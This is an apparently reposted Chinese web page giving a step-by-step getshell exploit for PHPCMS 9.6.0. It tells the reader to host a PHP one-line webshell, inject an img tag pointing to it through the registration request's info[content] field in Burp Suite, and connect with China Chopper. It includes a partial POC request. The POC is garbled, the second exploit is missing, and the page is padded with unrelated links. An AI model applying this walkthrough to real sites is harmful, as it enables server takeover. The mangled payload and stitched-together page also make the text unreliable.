phpcms公众号(php内容管理系统cms)
qiaoqingyi 发布:2023-11-17 13:10 7191
*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载
对于PHPcms9.6.0 最新版漏洞,具体利用步骤如下:
首先我们在本地搭建一个php环境,我这里是appserv(只要可以执行php文件就行)
在根目录下新建一个txt文本文件里面写上php一句话,如上图可以访问
接着我们找到phpcms网站注册模块,随便填一下信息
然后我们用burpsuite抓包
然后发送到repeater
我们在最下面的注册那儿使用img标签插入我们本地第一步搭建的一句话
poc如下:
siteid=1modelid=11username=zf1agac121password=aasgfaewee311as
email=a1ea21f94@qq.cominfo[content]=img src=dosubmit=1protocol=
只需要修改img里面的链接为你本地写入的一句话即可,还有要注意的是在repeater里测试go时每一次都要修改username,password和email字段值(不能重复,汗)
我们可以看到repeater里MYSQL query成功插入,接着访问上图repeater里我标黄语句,执行一句话
连接菜刀,getshell
利用方式二:
利用火狐的插件,操作如下
exp如下:三少
*原创作者:三少,本文属FreeBuf原创奖励计划,未经许可禁止转载
版权说明:如非注明,本站文章均为 邯郸市兰霖科技有限公司 原创,转载请注明出处和附带本文链接;
相关推荐
- 09-11西门子plc编程软件(西门子plc编程软件安装包)
- 09-11python编程实例(python编程案例教程)
- 09-11编程词(编程的专业术语)
- 09-11计算机编程学习(学计算机编程需要什么配置的电脑)
- 09-10lua编程(lua编程器下载)
- 09-11编程有多难(编程有什么用)
- 09-10数独编程(数独编程题)
- 09-10向对象编程(如何理解面向对象编程)
- 09-10少儿编程的创新点(少儿编程的优势和发展前景)
- 09-11线上编程课(线上编程课程培训机构排名)
- 最近发表
- 网站分类
- 标签列表